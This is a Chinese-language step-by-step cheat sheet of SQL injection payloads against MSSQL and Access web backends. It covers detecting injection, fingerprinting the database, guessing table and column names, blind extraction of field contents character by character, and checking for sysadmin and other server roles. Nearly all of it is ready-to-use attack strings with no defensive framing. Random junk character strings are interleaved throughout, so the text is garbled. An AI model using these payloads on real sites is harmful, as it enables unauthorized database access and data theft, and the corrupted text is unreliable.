1.判断是否有注入;and 1=1 ;and 1=2 CR#-!_=4
2.初步判断是否是mssql ;and user>0 19oyoi"
o`'4EVw*
3.注入参数是字符'and [查询条件] and ''=' k{ZQM
`7V1 F.\
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 9j5Z!Vsy
YX3NZW2i
5.判断数据库系统 NPa4I7`A
puEu)m^
;and (select count(*) from sysobjects)>0 mssql Rx.5;2m
^hT2ed +
;and (select count(*) from msysobjects)>0 access XZ(<Mo\v
iP$>/ [I
YuzVh9jTI
mfDt_Iq
6.猜数据库 ;and (select Count(*) from [数据库名])>0 RcO.1@2
} z7yS.{
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 kKC]
n
n 4H'FZ
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 B LZ<"npn
Lo}/k}3Sx
9.(1)猜字段的ascii值(access) *F(<:3;2
/&c>*4)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ^b= ;
%y)hYLOJ
(2)猜字段的ascii值(mssql) Ggv*EsN/cC
#AO}JP
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Q!7mN?l
!l6ht{
10.测试权限结构(mssql) c<Q*g
Q(BZg{
F2)KAIl
eOZ~p
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- v+<4?]EJ
,hT**(W
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- AOTtAV_e
Sj8fo^K50
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- "`a,/h'
RYl\Q,#
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- AF{@lDa1h
<